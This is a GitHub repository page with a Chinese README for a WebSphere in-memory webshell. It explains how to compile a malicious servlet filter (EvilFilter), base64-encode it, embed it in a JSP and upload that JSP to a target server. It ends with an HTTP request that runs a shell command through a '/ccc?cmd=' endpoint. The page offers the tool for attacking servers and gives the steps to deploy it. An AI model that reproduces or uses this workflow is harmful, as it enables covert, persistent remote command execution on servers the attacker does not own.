Skip to content

yiliufeng168/WebsphereMemoryWebshell

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
jsp
jsp
 
 
src
src
 
 
README.md
README.md
 
 

Repository files navigation

WebsphereMemoryWebshell

Websphere内存马

使用方式

  1. 自行修改src/EvilFilter.java中webshell实现方式,然后编译EvilFilter.java
cd src;
javac -classpath javax.servlet-api-4.0.1.jar ./EvilFilter.java
  1. 将生成的字节码转为base64格式
cat EvilFilter.class | base64 -w 0 > EvilFilter.class.base64

  1. 将EvilFilter.class.base64复制到jsp/webshell.jsp的第40行

  2. 此外还可以自行修改jsp/webshell.jsp的第25-27行

private static String filterName = "EvilFilter";
private static String filterClassName = "EvilFilter";
private static String url = "/ccc";

  1. 将jsp文件上传到目标服务器

  2. 访问

GET /ccc?cmd=touch%20/tmp/success HTTP/1.1
Host: 192.168.76.130:9443
Connection: close

About

Websphere内存马

Resources

Readme
Activity

Stars

4 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages